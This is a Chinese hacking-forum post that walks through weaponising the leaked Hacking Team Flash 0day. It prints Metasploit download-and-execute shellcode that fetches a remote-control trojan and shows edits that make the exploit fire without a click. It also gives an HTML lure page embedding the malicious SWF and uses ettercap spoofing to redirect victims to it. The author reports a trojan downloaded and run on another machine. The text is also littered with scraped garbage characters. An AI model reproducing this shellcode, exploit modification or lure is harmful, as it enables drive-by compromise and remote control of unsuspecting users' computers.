; h2 Y/ M- P3 P4 `' {1 M6 t) E 三、flash 0day之手工代码修改制作下载者实例入侵演示 8 b' G6 F& @. a5 l3 w; z/ x
4 z: h3 F, p6 ~! k+ s3 c$ B利用到的工具: & E1 S# I4 @: `) h
Msf
Ettercap ; o$ }: v/ |- Q- R
6 Z7 h! {7 {9 _3 F7 J1 fAdobe Flash CS6
) P! c1 [" ^' j9 a7 w; U" o9 M* m( f# M Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 1 J6 h R0 c1 k# \8 ?
' I- V6 w. B) j9 d v. w9 C下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 9 S* w+ N5 H+ ]6 c) Z5 D, A' b
/ i2 k& _6 i5 h+ g+ T" n. K, s5 U# |/ s+ g( i) I( g 如图: 9 ]: b0 {/ f! T3 S6 ^
4 Q$ v5 o( u% e3 {6 S# C. i- [$ o" c+ u, a! o7 V4 o. Y
! v2 |- T: G I( K+ A
! R' L4 r8 i k; R# `1 u 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
: G% a( ~; ~0 P2 P7 V: _8 y
然后执行generate -t dword生成shellcode,如下: * @0 O5 S U1 L9 A8 v# L
. Z1 j( J% z0 F3 Q
- _. f4 @9 i, P: ?' {( L
. B" d' U! q8 }0 C8 U8 O 复制代码到文本下便于我们一会编辑flash exp,如下: . C: Y, Q+ |, A; U2 x& x1 Q
( g, p# ~ ~* `0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
0 R0 C( a% e7 \8 w+ w0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
1 b. V' E( H3 S; ~3 z* E& s2 Q0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, u7 M% M- S. ?" B
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ) c3 u; E( k+ ~& ]4 L
3 B3 }4 z8 h8 a: T" p: I) M0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
7 i/ ]$ U4 W0 a0 I) a4 H. _- a 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 3 w9 U; R; v! r4 Y2 j) f1 B
9 b0 `- W4 S6 R) _. n0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, " _, m6 o# c: I
0 `1 k$ N! w8 G" p. B2 V' L6 M0 [# S$ t 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
: P/ _) B1 W, K* c$ c 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
# X& @/ J5 H3 G V% A 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, : s0 A2 i }9 P4 G) T1 D% Y
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 2 _/ ^* a) E+ s" E
# K" a6 s: H2 l' F9 F5 R5 H* U6 Q. n' k5 [8 U, s- n 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
9 X4 Z+ c3 y7 V, k$ _! |0 S2 |' W9 x9 H) z; {/ a 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 1 A) O9 ]1 ^) r6 Q+ e; u3 O
9 y5 P3 H/ v2 }) c3 Q 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 : O# D+ h6 k% m* q
7 _( @0 o9 e1 A5 {
7 B: c( v$ J" e* E% j% g. U9 x# p
2 I5 U0 [ q( k# Y, I6 h下面我们来修改flash 0day exp,需要修改三个文件,分别为:
' G' h7 I6 s- z; n. |" D# z2 g
& b4 t$ t, I' J4 U8 }: M 先修改ShellWin32.as,部分源代码如图:
% \0 [% p1 Y! I2 P/ E
& G! \( t$ [2 U y) w, ~ 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
7 @" r! ?* D# A* u# X N$ }
4 P3 L- d$ f, U! d. Y9 u 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
; P j# y) L# I1 n( D4 ~
% m4 q3 s8 T+ E
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
h: m. A8 _- p; }, p( R( u9 P
, {3 ?( i6 P1 ~0 N' ^+ |* {
8 c; E0 Z0 |# N4 i
然后点保存,下面我们来编译一下,打开
7 H, ^( f( _# i* f( eexp1.fla然后点文件-发布,看看编译没错误 . b# k1 A8 O) \, b+ ?1 L0 t& Q; b2 q
' C" A, a; B9 N* ^+ d( H' h % J6 B& i# a* S+ ^- q" `/ p
, c2 r" S# W/ d 然后我们把生成的
( i) n f* g' } exp1.swf丢到kailinux 的/var/www/html下: $ a* e% k! _" F$ f z8 l: z# {9 F
) @: {3 r% @$ @& ?, ^- h5 d' V1 M 然后把这段代码好好编辑一下 0 Z" p* U4 _0 E4 O9 g
N% W% u$ G- b2 \
7 d; L, F3 r2 X( M6 U5 `) D! a
: F- ^% z& D% D
/ J' z3 A) K7 K& o: r" G9 _1 p3 o + T- m6 E; K6 b
. i R$ z; n) A& t. m( c+ u2 u* U& M. c% M, F9 c ; X& t) s' P- a7 g8 O: X: G
. y" I& {6 S: O: R# P$ t! {1 Z5 _2 [
; m- P; i# L; K" a+ J; ?( }3 [0 V3 c( u# {' \: @ <!DOCTYPE html> - k8 v' A: K4 C# U) u' d
# w; }* l/ {4 L' F# h, _# n$ X0 \, Q. S- u+ \& c8 C <html> 6 G; C2 P9 S. \2 z
0 N) l2 e7 y" U<head>
<meta http-equiv="Content-Type" content="text/html;
4 u6 M/ k- B3 ~) } { charset=utf-8"/> ; \, X: j* e o
</head>
' ^' {, F1 }8 u; _$ C<body> 4 y- C) f6 r8 q8 J! O! P4 @8 @5 K$ S
2 H/ H. W+ V( p: }) @! d<h2> Please wait, the requested page is loading...</h2>
<br>
<OBJECT % j: f6 w3 J% k' b4 }
7 o/ a; W, M; N* B9 ^$ V, S: ~6 S: c
classid="clsid
27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><
ARAM NAME=movie 7 `; ~& @# v" }4 D4 o6 _" V+ P
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 4 l) p0 G4 y7 N$ A/ O
</body>
( N! L- ~0 N# Z9 B6 `% a <script> 8 J. R$ b2 e; c/ K" e' U
8 \, u$ h% \& n2 D setTimeout(function () { . t) y& U0 z }; e& C: @- a( N
% b; p+ ]& R# t) L 7 M( x# w# O0 Y
6 L2 S$ \5 O( A* w window.location.reload();
}, 10000); ! _+ R" l& N- [6 U1 G
$ G) p8 x( x4 |* p7 V; U" x' n* [5 q6 n. v% t+ o1 F0 `
* _# j, x- i- i( g4 U' g</script>
& i$ E5 F* p+ N/ s0 T, R0 h2 D</html>
1 |5 l: _3 k5 s8 |: s. K, B/ S- q |3 R+ u+ u
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
" W$ w1 ?) P" }$ T - M+ ?' {' H9 c
% V8 ~- S$ X; Q" K6 F
& r; }/ n! t' l3 s) e) [ X/ t3 X# D9 X- J/ C7 t2 p
- O/ p9 g" e7 H6 n1 O7 ?- R下面我们用ettercap欺骗如图: 6 H2 s- Q# x. W6 C
8 D8 B9 G+ F" ]+ w7 C. N& D; \ 2 p5 w5 _8 }5 M; g4 Z6 r
7 G; o9 _( \/ v6 D( V, B1 U2 b2 C' R( a7 c( K9 q 下面我们随便访问个网站看看: - C1 O: O* C: q' O
8 T5 Y. l2 I" i$ \4 X% ^1 d+ n8 c1 e我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ! B0 ^% H, J9 U' H
! `2 O. G! p8 S& W ]
8 k1 _! v5 [( s8 d2 Y" e4 {
; u; C& t- f3 W8 U 我们看另一台,
提示这个错误,说明木马是成功被下载执行了,
只是由于某些原因没上线而已。。。
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |